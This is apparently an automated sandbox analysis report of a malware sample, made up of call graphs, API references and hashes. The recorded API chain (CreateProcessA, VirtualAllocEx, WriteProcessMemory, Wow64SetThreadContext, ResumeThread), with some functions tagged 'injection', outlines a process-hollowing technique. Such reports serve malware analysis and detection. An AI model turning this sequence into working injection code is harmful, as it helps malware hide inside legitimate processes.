14ab079 51829->51818 51830->51829 51831 14aa188 LoadLibraryExW 51830->51831 51831->51829 51833 14ab620 LoadLibraryExW 51832->51833 51835 14ab699 51833->51835 51835->51827 51837 14ad335 51836->51837 51838 14ad36f 51837->51838 51844 14acf14 51837->51844 51838->51806 51841 14ad335 51840->51841 51842 14acf14 2 API calls 51841->51842 51843 14ad36f 51841->51843 51842->51843 51843->51806 51845 14acf1f 51844->51845 51847 14adc80 51845->51847 51848 14ad03c 51845->51848 51847->51847 51849 14ad047 51848->51849 51850 14a5d04 2 API calls 51849->51850 51851 14adcef 51850->51851 51851->51847 51852 7108c88 51853 7108cbf 51852->51853 51855 14a82f7 2 API calls 51853->51855 51856 14a5d04 2 API calls 51853->51856 51854 7108dbf 51855->51854 51856->51854 51773 14ad440 51774 14ad486 GetCurrentProcess 51773->51774 51776 14ad4d8 GetCurrentThread 51774->51776 51777 14ad4d1 51774->51777 51778 14ad515 GetCurrentProcess 51776->51778 51779 14ad50e 51776->51779 51777->51776 51782 14ad54b 51778->51782 51779->51778 51780 14ad573 GetCurrentThreadId 51781 14ad5a4 51780->51781 51782->51780 51975 a246dc8 51976 a246f53 51975->51976 51977 a246dee 51975->51977 51977->51976 51979 a242928 51977->51979 51980 a247048 PostMessageW 51979->51980 51981 a2470b4 51980->51981 51981->51977 51982 a24464a 51983 a244650 51982->51983 51984 a2442e2 51983->51984 51989 a245c36 12 API calls 51983->51989 52010 a245bd8 51983->52010 52026 a245bc8 51983->52026 51985 a2444db 51984->51985 51987 a245bc8 12 API calls 51984->51987 51988 a245bd8 12 API calls 51984->51988 51992 a245c36 51984->51992 51987->51984 51988->51984 51989->51984 51994 a245bc4 51992->51994 51996 a245c39 51992->51996 51993 a245b9b 51993->51984 51994->51993 52043 a245ff4 51994->52043 52048 a2460eb 51994->52048 52053 a24652a 51994->52053 52058 a24658c 51994->52058 52063 a2463da 51994->52063 52069 a2462fe 51994->52069 52073 a2465bd 51994->52073 52078 a2466bd 51994->52078 52083 a246011 51994->52083 52089 a2462d0 51994->52089 52094 a246150 51994->52094 52099 a246617 51994->52099 52103 a2460f6 51994->52103 51995 a245c16 51995->51984 51996->51984 52011 a245bf2 52010->52011 52013 a24658c 2 API calls 52011->52013 52014 a24652a 2 API calls 52011->52014 52015 a2460eb 2 API calls 52011->52015 52016 a245ff4 2 API calls 52011->52016 52017 a2460f6 2 API calls 52011->52017 52018 a246617 2 API calls 52011->52018 52019 a246150 2 API calls 52011->52019 52020 a2462d0 2 API calls 52011->52020 52021 a246011 2 API calls 52011->52021 52022 a2466bd 2 API calls 52011->52022 52023 a2465bd 2 API calls 52011->52023 52024 a2462fe 2 API calls 52011->52024 52025 a2463da 2 API calls 52011->52025 52012 a245c16 52012->51984 52013->52012 52014->52012 52015->52012 52016->52012 52017->52012 52018->52012 52019->52012 52020->52012 52021->52012 52022->52012 52023->52012 52024->52012 52025->52012 52027 a245bd2 52026->52027 52028 a245b9b 52026->52028 52030 a24658c 2 API calls 52027->52030 52031 a24652a 2 API calls 52027->52031 52032 a2460eb 2 API calls 52027->52032 52033 a245ff4 2 API calls 52027->52033 52034 a2460f6 2 API calls 52027->52034 52035 a246617 2 API calls 52027->52035 52036 a246150 2 API calls 52027->52036 52037 a2462d0 2 API calls 52027->52037 52038 a246011 2 API calls 52027->52038 52039 a2466bd 2 API calls 52027->52039 52040 a2465bd 2 API calls 52027->52040 52041 a2462fe 2 API calls 52027->52041 52042 a2463da 2 API calls 52027->52042 52028->51984 52029 a245c16 52029->51984 52030->52029 52031->52029 52032->52029 52033->52029 52034->52029 52035->52029 52036->52029 52037->52029 52038->52029 52039->52029 52040->52029 52041->52029 52042->52029 52044 a246004 52043->52044 52108 a243e74 52044->52108 52112 a243e80 52044->52112 52049 a2466c4 52048->52049 52116 a243ce0 52049->52116 52120 a243ce8 52049->52120 52050 a2466e6 52054 a2467fb 52053->52054 52124 a243a60 52054->52124 52128 a243a59 52054->52128 52055 a246816 52059 a24659c 52058->52059 52060 a2465f0 52059->52060 52132 a243bf0 52059->52132 52136 a243bf8 52059->52136 52064 a24655a 52063->52064 52140 a246c60 52064->52140 52145 a246cb0 52064->52145 52151 a246c70 52064->52151 52065 a246576 52071 a243a60 Wow64SetThreadContext 52069->52071 52072 a243a59 Wow64SetThreadContext 52069->52072 52070 a246318 52070->51995 52071->52070 52072->52070 52074 a2465c2 52073->52074 52076 a243bf0 WriteProcessMemory 52074->52076 52077 a243bf8 WriteProcessMemory 52074->52077 52075 a2465f0 52076->52075 52077->52075 52079 a2466c3 52078->52079 52080 a2466e6 52079->52080 52081 a243ce0 ReadProcessMemory 52079->52081 52082 a243ce8 ReadProcessMemory 52079->52082 52081->52080 52082->52080 52084 a246004 52083->52084 52085 a246b73 52084->52085 52087 a243e74 CreateProcessA 52084->52087 52088 a243e80 CreateProcessA 52084->52088 52086 a2460b4 52086->51995 52087->52086 52088->52086 52090 a2462d6 52089->52090 52092 a243bf0 WriteProcessMemory 52090->52092 52093 a243bf8 WriteProcessMemory 52090->52093 52091 a2467e8 52091->51995 52092->52091 52093->52091 52095 a24610d 52094->52095 52096 a246122 52094->52096 52164 a2439b0 52095->52164 52168 a2439a9 52095->52168 52096->51995 52101 a243bf0 WriteProcessMemory 52099->52101 52102 a243bf8 WriteProcessMemory 52099->52102 52100 a24663f 52101->52100 52102->52100 52104 a2460fc 52103->52104 52106 a2439b0 ResumeThread 52104->52106 52107 a2439a9 ResumeThread 52104->52107 52105 a246122 52105->51995 52106->52105 52107->52105 52109 a243f09 CreateProcessA 52108->52109 52111 a2440cb 52109->52111 52113 a243f09 CreateProcessA 52112->52113 52115 a2440cb 52113->52115 52117 a243d33 ReadProcessMemory 52116->52117 52119 a243d77 52117->52119 52119->52050 52121 a243d33 ReadProcessMemory 52120->52121 52123 a243d77 52121->52123 52123->52050 52125 a243aa5 Wow64SetThreadContext 52124->52125 52127 a243aed 52125->52127 52127->52055 52129 a243aa5 Wow64SetThreadContext 52128->52129 52131 a243aed 52129->52131 52131->52055 52133 a243c40 WriteProcessMemory 52132->52133 52135 a243c97 52133->52135 52135->52060 52137 a243c40 WriteProcessMemory 52136->52137 52139 a243c97 52137->52139 52139->52060 52141 a246c85 52140->52141 52156 a243b38 52141->52156 52160 a243b30 52141->52160 52142 a246ca4 52142->52065 52146 a246c8f 52145->52146 52147 a246cba 52145->52147 52149 a243b30 VirtualAllocEx 52146->52149 52150 a243b38 VirtualAllocEx 52146->52150 52147->52065 52148 a246ca4 52148->52065 52149->52148 52150->52148 52152 a246c85 52151->52152 52154 a243b30 VirtualAllocEx 52152->52154 52155 a243b38 VirtualAllocEx 52152->52155 52153 a246ca4 52153->52065 52154->52153 52155->52153 52157 a243b78 VirtualAllocEx 52156->52157 52159 a243bb5 52157->52159 52159->52142 52161 a243b78 VirtualAllocEx 52160->52161 52163 a243bb5 52161->52163 52163->52142 52165 a2439f0 ResumeThread 52164->52165 52167 a243a21 52165->52167 52167->52096 52169 a2439f0 ResumeThread 52168->52169 52171 a243a21 52169->52171 52171->52096 51902 88750c8 51903 88750da 51902->51903 51905 88750f0 51902->51905 51906 8873204 51903->51906 51907 887320f 51906->51907 51908 8875546 51907->51908 51911 88764c0 51907->51911 51916 88764d0 51907->51916 51908->51905 51913 88764d0 51911->51913 51912 8876506 51912->51907 51913->51912 51921 88732a4 51913->51921 51918 88764f1 51916->51918 51917 8876506 51917->51907 51918->51917 51919 88732a4 DrawTextExW 51918->51919 51920 8876545 51919->51920 51922 88732af 51921->51922 51923 8876545 51922->51923 51926 71041b8 51922->51926 51932 7107098 51922->51932 51928 71041c3 51926->51928 51927 71070e1 51927->51923 51928->51927 51938 7107c60 51928->51938 51941 7107c5b 51928->51941 51929 71071f4 51929->51923 51933 71070a8 51932->51933 51934 71070e1 51933->51934 51936 7107c60 DrawTextExW 51933->51936 51937 7107c5b DrawTextExW 51933->51937 51934->51923 51935 71071f4 51935->51923 51936->51935 51937->51935 51945 7106e24 51938->51945 51942 7107c60 51941->51942 51943 7106e24 DrawTextExW 51942->51943 51944 7107c7d 51943->51944 51944->51929 51946 7107c98 DrawTextExW 51945->51946 51948 7107c7d 51946->51948 51948->51929 52172 70f12f0 52173 70f1300 52172->52173 52174 70f1318 52173->52174 52178 7104380 52173->52178 52189 7104370 52173->52189 52200 7104348 52173->52200 52179 7104458 52178->52179 52188 71043a8 52178->52188 52182 710172c DrawTextExW 52179->52182 52184 710447e 52179->52184 52181 71043c0 52224 7105018 52181->52224 52229 7105120 52181->52229 52234 7104030 52181->52234 52182->52184 52183 71043ed 52183->52174 52184->52174 52213 710172c 52188->52213 52190 7104458 52189->52190 52191 71043a8 52189->52191 52194 710172c DrawTextExW 52190->52194 52196 710447e 52190->52196 52192 710172c DrawTextExW 52191->52192 52193 71043c0 52192->52193 52197 7104030 DrawTextExW 52193->52197 52198 7105120 DrawTextExW 52193->52198 52199 7105018 DrawTextExW 52193->52199 52194->52196 52195 71043ed 52195->52174 52196->52174 52197->52195 52198->52195 52199->52195 52201 71043a0 52200->52201 52202 7104357 52200->52202 52203 7104458 52201->52203 52204 71043a8 52201->52204 52202->52174 52207 710172c DrawTextExW 52203->52207 52209 710447e 52203->52209 52205 710172c DrawTextExW 52204->52205 52206 71043c0 52205->52206 52210 7104030 DrawTextExW 52206->52210 52211 7105120 DrawTextExW 52206->52211 52212 7105018 DrawTextExW 52206->52212 52207->52209 52208 71043ed 52208->52174 52209->52174 52210->52208 52211->52208 52212->52208 52215 7101737 52213->52215 52214 7104f04 52214->52181 52215->52214 52216 7104f47 52215->52216 52222 7104f67 52215->52222 52217 7104020 DrawTextExW 52216->52217 52218 7104f4c 52217->52218 52218->52181 52219 7104fa3 52220 7104fbc 52219->52220 52239 7104020 52219->52239 52220->52181 52222->52219 52223 710172c DrawTextExW 52222->52223 52223->52219 52226 7105057 52224->52226 52225 7105156 52225->52183 52226->52225 52227 71041b8 DrawTextExW 52226->52227 52228 71051c1 52227->52228 52231 7105141 52229->52231 52230 7105156 52230->52183 52231->52230 52232 71041b8 DrawTextExW 52231->52232 52233 71051c1 52232->52233 52235 710403b 52234->52235 52236 7105156 52235->52236 52237 71041b8 DrawTextExW 52235->52237 52236->52183 52238 71051c1 52237->52238 52240 710402b 52239->52240 52241 7104030 DrawTextExW 52240->52241 52242 7104ff3 52241->52242 52242->52220

            Executed Functions

            Function 014AD430 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetCurrentProcess.KERNEL32 ref: 014AD4BE
            • GetCurrentThread.KERNEL32 ref: 014AD4FB
            • GetCurrentProcess.KERNEL32 ref: 014AD538
            • GetCurrentThreadId.KERNEL32 ref: 014AD591
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: 96ffbce18cad849e0b7bbf08f3232bb9e1c3b1a3bc1d2fe5543b3124f5db7db4
            • Instruction ID: 5967e693fb78b5a633c16800cd6a4cb4717e3505f58b342de142b794737987ec
            • Opcode Fuzzy Hash: 96ffbce18cad849e0b7bbf08f3232bb9e1c3b1a3bc1d2fe5543b3124f5db7db4
            • Instruction Fuzzy Hash: A45148B09003498FEB58CFA9D5487DEBBF1FF88314F20845AE119A7360DB745944CB66
            Function 014AD440 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
            Download Yara Rule

            Control-flow Graph

            APIs
            • GetCurrentProcess.KERNEL32 ref: 014AD4BE
            • GetCurrentThread.KERNEL32 ref: 014AD4FB
            • GetCurrentProcess.KERNEL32 ref: 014AD538
            • GetCurrentThreadId.KERNEL32 ref: 014AD591
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: d30bb91c9c7a90bc5a2fe60dfd018a0b65e3a065fde2cbfb21d4532c147b33a7
            • Instruction ID: 96107accb355221943982b5f458a2ac2f9834079896a4ab1362a5e77a2eef51f
            • Opcode Fuzzy Hash: d30bb91c9c7a90bc5a2fe60dfd018a0b65e3a065fde2cbfb21d4532c147b33a7
            • Instruction Fuzzy Hash: 695147B09003498FEB58CFA9D548BDEBFF1BF88314F20845AE119A7360DB746944CB66
            Function 0A243E74 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 129 a243e74-a243f15 131 a243f17-a243f21 129->131 132 a243f4e-a243f6e 129->132 131->132 133 a243f23-a243f25 131->133 139 a243fa7-a243fd6 132->139 140 a243f70-a243f7a 132->140 134 a243f27-a243f31 133->134 135 a243f48-a243f4b 133->135 137 a243f35-a243f44 134->137 138 a243f33 134->138 135->132 137->137 141 a243f46 137->141 138->137 146 a24400f-a2440c9 CreateProcessA 139->146 147 a243fd8-a243fe2 139->147 140->139 142 a243f7c-a243f7e 140->142 141->135 144 a243f80-a243f8a 142->144 145 a243fa1-a243fa4 142->145 148 a243f8c 144->148 149 a243f8e-a243f9d 144->149 145->139 160 a2440d2-a244158 146->160 161 a2440cb-a2440d1 146->161 147->146 151 a243fe4-a243fe6 147->151 148->149 149->149 150 a243f9f 149->150 150->145 152 a243fe8-a243ff2 151->152 153 a244009-a24400c 151->153 155 a243ff4 152->155 156 a243ff6-a244005 152->156 153->146 155->156 156->156 158 a244007 156->158 158->153 171 a244168-a24416c 160->171 172 a24415a-a24415e 160->172 161->160 174 a24417c-a244180 171->174 175 a24416e-a244172 171->175 172->171 173 a244160 172->173 173->171 177 a244190-a244194 174->177 178 a244182-a244186 174->178 175->174 176 a244174 175->176 176->174 179 a2441a6-a2441ad 177->179 180 a244196-a24419c 177->180 178->177 181 a244188 178->181 182 a2441c4 179->182 183 a2441af-a2441be 179->183 180->179 181->177 185 a2441c5 182->185 183->182 185->185
            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A2440B6
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: 844425f75a299a86c96ed70587e0eac8c07b6d71a69471d1d0f119684a49ac8a
            • Instruction ID: 06748cc3056bb79f304e655806b639dc81ae9f6562c01425d34f32017e03414e
            • Opcode Fuzzy Hash: 844425f75a299a86c96ed70587e0eac8c07b6d71a69471d1d0f119684a49ac8a
            • Instruction Fuzzy Hash: F6A18E71D1065ADFEF28DF68C841BEDBBB2BF48310F1581A9E808A7240DB749985CF91
            Function 0A243E80 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 186 a243e80-a243f15 188 a243f17-a243f21 186->188 189 a243f4e-a243f6e 186->189 188->189 190 a243f23-a243f25 188->190 196 a243fa7-a243fd6 189->196 197 a243f70-a243f7a 189->197 191 a243f27-a243f31 190->191 192 a243f48-a243f4b 190->192 194 a243f35-a243f44 191->194 195 a243f33 191->195 192->189 194->194 198 a243f46 194->198 195->194 203 a24400f-a2440c9 CreateProcessA 196->203 204 a243fd8-a243fe2 196->204 197->196 199 a243f7c-a243f7e 197->199 198->192 201 a243f80-a243f8a 199->201 202 a243fa1-a243fa4 199->202 205 a243f8c 201->205 206 a243f8e-a243f9d 201->206 202->196 217 a2440d2-a244158 203->217 218 a2440cb-a2440d1 203->218 204->203 208 a243fe4-a243fe6 204->208 205->206 206->206 207 a243f9f 206->207 207->202 209 a243fe8-a243ff2 208->209 210 a244009-a24400c 208->210 212 a243ff4 209->212 213 a243ff6-a244005 209->213 210->203 212->213 213->213 215 a244007 213->215 215->210 228 a244168-a24416c 217->228 229 a24415a-a24415e 217->229 218->217 231 a24417c-a244180 228->231 232 a24416e-a244172 228->232 229->228 230 a244160 229->230 230->228 234 a244190-a244194 231->234 235 a244182-a244186 231->235 232->231 233 a244174 232->233 233->231 236 a2441a6-a2441ad 234->236 237 a244196-a24419c 234->237 235->234 238 a244188 235->238 239 a2441c4 236->239 240 a2441af-a2441be 236->240 237->236 238->234 242 a2441c5 239->242 240->239 242->242
            APIs
            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A2440B6
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: CreateProcess
            • String ID:
            • API String ID: 963392458-0
            • Opcode ID: 728e9977743689f6c7a46b8824511033a216ca433ca40515e8ca0568c59e0c6b
            • Instruction ID: 63ca604914cb72b950c6b3fa6bd877879780a122f66320dae381423f9ee233f2
            • Opcode Fuzzy Hash: 728e9977743689f6c7a46b8824511033a216ca433ca40515e8ca0568c59e0c6b
            • Instruction Fuzzy Hash: FE916C71D1061ADFEF28DF68C841BDEBBB2BF48310F1581A9E808A7240DB749985CF91
            Function 014AADA8 Relevance: 1.7, APIs: 1, Instructions: 198COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 243 14aada8-14aadb7 244 14aadb9-14aadc6 call 14aa120 243->244 245 14aade3-14aade7 243->245 251 14aadc8 244->251 252 14aaddc 244->252 247 14aadfb-14aae3c 245->247 248 14aade9-14aadf3 245->248 254 14aae49-14aae57 247->254 255 14aae3e-14aae46 247->255 248->247 299 14aadce call 14ab040 251->299 300 14aadce call 14ab031 251->300 252->245 256 14aae7b-14aae7d 254->256 257 14aae59-14aae5e 254->257 255->254 262 14aae80-14aae87 256->262 259 14aae69 257->259 260 14aae60-14aae67 call 14aa12c 257->260 258 14aadd4-14aadd6 258->252 261 14aaf18-14aafd8 258->261 264 14aae6b-14aae79 259->264 260->264 294 14aafda-14aafdd 261->294 295 14aafe0-14ab00b GetModuleHandleW 261->295 265 14aae89-14aae91 262->265 266 14aae94-14aae9b 262->266 264->262 265->266 269 14aaea8-14aaeb1 call 14aa13c 266->269 270 14aae9d-14aaea5 266->270 274 14aaebe-14aaec3 269->274 275 14aaeb3-14aaebb 269->275 270->269 276 14aaee1-14aaeee 274->276 277 14aaec5-14aaecc 274->277 275->274 284 14aaef0-14aaf0e 276->284 285 14aaf11-14aaf17 276->285 277->276 279 14aaece-14aaede call 14aa14c call 14aa15c 277->279 279->276 284->285 294->295 296 14ab00d-14ab013 295->296 297 14ab014-14ab028 295->297 296->297 299->258 300->258
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 014AAFFE
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: d052d424cd75c7fc241ae58cd0d2490ac184ffd9fc7f39f4727b7b52e5a8a09d
            • Instruction ID: 8adf898d2ef1bbc6c728e630a2eb810d8c8ec31d1d62f4b21c548fcbc5d20d26
            • Opcode Fuzzy Hash: d052d424cd75c7fc241ae58cd0d2490ac184ffd9fc7f39f4727b7b52e5a8a09d
            • Instruction Fuzzy Hash: CA714470A00B058FD728DF2AC44479BBBF1FF98214F10892ED58A97B50DB74E845CB91
            Function 014A590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 301 14a590c-14a59d9 CreateActCtxA 303 14a59db-14a59e1 301->303 304 14a59e2-14a5a3c 301->304 303->304 311 14a5a4b-14a5a4f 304->311 312 14a5a3e-14a5a41 304->312 313 14a5a60 311->313 314 14a5a51-14a5a5d 311->314 312->311 316 14a5a61 313->316 314->313 316->316
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 014A59C9
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 0a9910320b8bee0658382c015866645ad3b8971d2ca8eb5cbcb3aa1ebf5e9ffd
            • Instruction ID: 0b1db4ccbab993ec26ee8ae2de74c2e4572d4fc64d7985a6cb7ac6745c197d63
            • Opcode Fuzzy Hash: 0a9910320b8bee0658382c015866645ad3b8971d2ca8eb5cbcb3aa1ebf5e9ffd
            • Instruction Fuzzy Hash: 664101B0C0071DCBEB24CFA9C9847DEBBB5BF49704F60815AD408AB261DB716946CF90
            Function 014A4514 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 317 14a4514-14a59d9 CreateActCtxA 320 14a59db-14a59e1 317->320 321 14a59e2-14a5a3c 317->321 320->321 328 14a5a4b-14a5a4f 321->328 329 14a5a3e-14a5a41 321->329 330 14a5a60 328->330 331 14a5a51-14a5a5d 328->331 329->328 333 14a5a61 330->333 331->330 333->333
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 014A59C9
            Memory Dump Source
            • Source File: 00000009.00000002.2152448143.00000000014A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_14a0000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 462489825c7e29c89554f7ff73e67fea6f3089cbb826bab77c7309bfac0001ee
            • Instruction ID: 3a8d1555ca8d62c3275492e727b7c94dc5693cb9a820b7689e2f16401c3514c8
            • Opcode Fuzzy Hash: 462489825c7e29c89554f7ff73e67fea6f3089cbb826bab77c7309bfac0001ee
            • Instruction Fuzzy Hash: 9C41F1B0D0071DCBDB24CFA9C984BCEBBB5BF49704F60816AD408AB261DB716945CF90
            Function 0A243BF0 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 334 a243bf0-a243c46 336 a243c56-a243c95 WriteProcessMemory 334->336 337 a243c48-a243c54 334->337 339 a243c97-a243c9d 336->339 340 a243c9e-a243cce 336->340 337->336 339->340
            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A243C88
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: 3a49aba019eb6d7c72b18bebb614a8e0b9bfdb1c16c59388c395ab3fae3cc1fb
            • Instruction ID: 8083a6daf9379925d47a4624a2732b583e77bf9db0bf029f75c940632b4cc182
            • Opcode Fuzzy Hash: 3a49aba019eb6d7c72b18bebb614a8e0b9bfdb1c16c59388c395ab3fae3cc1fb
            • Instruction Fuzzy Hash: 032137B59003499FDB14CFA9C885BEEBBF1FF48310F108529E919A7240C7789954DFA4
            Function 07106E24 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 344 7106e24-7107ce4 346 7107ce6-7107cec 344->346 347 7107cef-7107cfe 344->347 346->347 348 7107d00 347->348 349 7107d03-7107d3c DrawTextExW 347->349 348->349 350 7107d45-7107d62 349->350 351 7107d3e-7107d44 349->351 351->350
            APIs
            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07107C7D,?,?), ref: 07107D2F
            Memory Dump Source
            • Source File: 00000009.00000002.2157167919.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_7100000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: DrawText
            • String ID:
            • API String ID: 2175133113-0
            • Opcode ID: c190187c5e5034ed41af9b5b8bd0d3efb7bad536523ffe175504a1ef25ff572f
            • Instruction ID: 1e181afbe6c6c9d2ad360675fceb62f6c84589ea7f41541baddda2bd7a7c76de
            • Opcode Fuzzy Hash: c190187c5e5034ed41af9b5b8bd0d3efb7bad536523ffe175504a1ef25ff572f
            • Instruction Fuzzy Hash: 1B31E6B590030A9FDB11CF9AD98469EBBF5FB48320F54842AE515A7250D775A940CFA0
            Function 07107C90 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 354 7107c90-7107ce4 355 7107ce6-7107cec 354->355 356 7107cef-7107cfe 354->356 355->356 357 7107d00 356->357 358 7107d03-7107d3c DrawTextExW 356->358 357->358 359 7107d45-7107d62 358->359 360 7107d3e-7107d44 358->360 360->359
            APIs
            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07107C7D,?,?), ref: 07107D2F
            Memory Dump Source
            • Source File: 00000009.00000002.2157167919.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_7100000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: DrawText
            • String ID:
            • API String ID: 2175133113-0
            • Opcode ID: 027dc507dc16a1d8a40202aadf8427537b1c6555375788499ec618d7b2ddc313
            • Instruction ID: f4ce16ef71e0ead002ddbedda8279aab5872f3abc80653cbaa9ee34271ddb703
            • Opcode Fuzzy Hash: 027dc507dc16a1d8a40202aadf8427537b1c6555375788499ec618d7b2ddc313
            • Instruction Fuzzy Hash: 6E31E3B5D0020A9FDF01CF99D9846EEBBF5BF48320F14842AE919A7350D774A954CFA0
            Function 0A243BF8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 363 a243bf8-a243c46 365 a243c56-a243c95 WriteProcessMemory 363->365 366 a243c48-a243c54 363->366 368 a243c97-a243c9d 365->368 369 a243c9e-a243cce 365->369 366->365 368->369
            APIs
            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A243C88
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MemoryProcessWrite
            • String ID:
            • API String ID: 3559483778-0
            • Opcode ID: 1f876f7b7ca94b542d7bcdd4e128bc7d41a48f159fe93fb6b44d1065efffed49
            • Instruction ID: 764a560bd2ff585c73e5eb9b6afbe4ff2847e901bfa53ef66ed1db67b454bd00
            • Opcode Fuzzy Hash: 1f876f7b7ca94b542d7bcdd4e128bc7d41a48f159fe93fb6b44d1065efffed49
            • Instruction Fuzzy Hash: 112126B19103499FDB14CFAAC985BDEBBF5FF48320F10842AE918A7240D7789950DBA4
            Function 0A243CE0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 373 a243ce0-a243d75 ReadProcessMemory 376 a243d77-a243d7d 373->376 377 a243d7e-a243dae 373->377 376->377
            APIs
            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A243D68
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_9_2_a240000_bmkNCLNkqvOpVZ.jbxd
            Similarity
            • API ID: MemoryProcessRead
            • String ID:
            • API String ID: 1726664587-0
            • Opcode ID: 7aef33f6d72d8ce390b0b3619eeaf9250c847709afd9352653aac9b709cc26de
            • Instruction ID: 7dd99864833dac463a808ecda9eca149d30a5fa3d065cd095a6240290fd5c769
            • Opcode Fuzzy Hash: 7aef33f6d72d8ce390b0b3619eeaf9250c847709afd9352653aac9b709cc26de
            • Instruction Fuzzy Hash: 082124B18017499FDB10CFAAC881AEEBBB1BF48320F50842AE519A7250C7789910DF60
            Function 0A243A59 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
            Download Yara Rule
            APIs
            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A243ADE
            Memory Dump Source
            • Source File: 00000009.00000002.2158329955.000000000A240000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A240000, based on PE: false
            Joe Sandbox IDA Plugin
